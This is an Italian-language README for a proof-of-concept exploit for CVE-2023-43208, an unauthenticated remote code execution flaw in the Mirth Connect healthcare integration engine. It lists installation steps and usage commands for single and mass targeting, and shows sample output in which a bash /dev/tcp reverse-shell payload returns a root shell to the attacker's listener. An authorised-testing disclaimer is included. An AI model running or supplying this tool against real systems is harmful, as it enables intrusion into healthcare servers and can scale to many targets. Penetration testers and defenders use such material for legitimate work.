
Un exploit PoC per CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
Exploit Proof-of-Concept per CVE-2023-43208, una vulnerabilità di Esecuzione Remota di Codice non autenticata in Mirth Connect versioni precedenti alla
4.4.1.
Mirth Connect è un motore di integrazione sanitaria open-source ampiamente distribuito. Questa vulnerabilità sfrutta un difetto di deserializzazione Java tramite l'endpoint /api/users utilizzando un payload XML modificato che incatena gadget Apache Commons Collections per ottenere RCE non autenticata.
La versione migliorata sostituisce il listener pwncat originale con una shell PTY interattiva completamente priva di dipendenze, utilizzando solo librerie standard di Python (socket, select, tty, termios). La shell viene automaticamente aggiornata a una PTY completa alla connessione.
| Software | Versioni Vulnerabili | Versione Corretta |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script)stty rows/cols)pwncat — solo libreria standard per il listenergit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi.
L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si è ottenuto esplicito permesso è illegale.
Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.
| Flag | Descrizione |
|---|
-u, --url | URL del target |
-lh, --lhost | Il tuo IP di ascolto |
-lp, --lport | La tua porta in ascolto |
-bp, --bindport | Override della porta di binding (utile con ngrok) |
-f, --file | File contenente l'elenco degli URL target |
-o, --output | Salva i target vulnerabili su file |
-t, --threads | Numero di thread per la scansione (default: 50) |